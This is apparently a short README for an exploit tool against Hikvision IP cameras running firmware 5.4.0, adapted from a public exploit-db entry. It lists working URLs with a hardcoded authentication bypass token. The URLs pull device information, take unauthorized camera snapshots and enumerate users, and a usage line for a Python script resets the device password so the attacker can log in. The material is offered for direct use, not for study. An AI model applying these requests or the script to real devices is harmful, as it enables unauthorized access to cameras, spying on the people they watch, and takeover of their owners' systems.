Exploit tool for Hikvision IP Camera 5.4.0
using python 3.9, just download and execute.
-
Information Gathering : http://[IP Address]:[port]/System/deviceInfo?auth=YWRtaW46MTEK it will show you the firmware version and all of device information.
-
Get an unauthorized snapshot from the camera:http://[IP Address]:[port]/onvif-http/snapshot?auth=YWRtaW46MTEK
-
Enum User : http://[IP Address]:[port]/Security/users?auth=YWRtaW46MTEK
-
Execute the payload : Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)] python3 exploit.py 10.10.10.10 8899 Y
-
Done, you can login with new password.
Modified from Exploit Author: Matamorphosis
https://www.exploit-db.com/exploits/44328
https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html